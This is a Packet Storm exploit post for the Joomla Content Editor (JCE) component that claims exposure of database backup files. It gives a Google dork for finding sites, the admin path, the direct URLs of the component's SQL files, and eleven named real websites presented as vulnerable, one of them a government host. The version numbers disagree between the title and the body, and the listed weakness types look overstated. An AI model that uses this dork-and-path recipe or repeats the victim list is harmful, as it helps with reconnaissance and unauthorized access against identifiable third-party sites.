Joomla JCE 2.6.33 Database Backup Disclosure

2018-12-01T00:00:00
ID PACKETSTORM:150548
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-01T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database  
Backup Disclosure Information Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 30/11/2018  
# Vendor Homepage : joomlacontenteditor.net  
# Software Download Links : joomlacontenteditor.net/downloads/  
+  
github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql  
+  
gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql  
+ JCE 2.6.33 =>  
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=  
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266  
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.6.33 ~ 2.5.24  
# Google Dorks : inurl:''/index.php?option=com_jce''  
Index of /administrator/components/com_jce/sql/  
# Exploit Risk : Medium  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/administrator/  
  
# Exploit :  
  
/administrator/components/com_jce/sql/mysql.sql  
  
/administrator/components/com_jce/sql/postgresql.sql  
  
/administrator/components/com_jce/sql/sqlsrv.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] volunteers.joomla.org/www/administrator/components/com_jce/sql/mysql.sql  
  
[+]  
freightdb.kzntransport.gov.za/administrator/components/com_jce/sql/mysql.sql  
  
[+] murraynebraska.com/nl/administrator/components/com_jce/sql/mysql.sql  
  
[+] rkbell.ca/joomla30/administrator/components/com_jce/sql/mysql.sql  
  
[+] vir.nw.ru/test/vir.nw/administrator/components/com_jce/sql/mysql.sql  
  
[+]  
weepingwaternebraska.com/nl/administrator/components/com_jce/sql/mysql.sql  
  
[+] fotozrak.mk/print/administrator/components/com_jce/sql/mysql.sql  
  
[+]  
colegioconcepciondeparral.cl/ccparral/administrator/components/com_jce/sql/mysql.sql  
  
[+] elmwoodnebraska.com/nl/administrator/components/com_jce/sql/mysql.sql  
  
[+]  
nowagalicja.itl.pl/files/jce/administrator/components/com_jce/sql/sqlsrv.sql  
  
[+] aeroglobal.org/ios/administrator/components/com_jce/sql/mysql.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`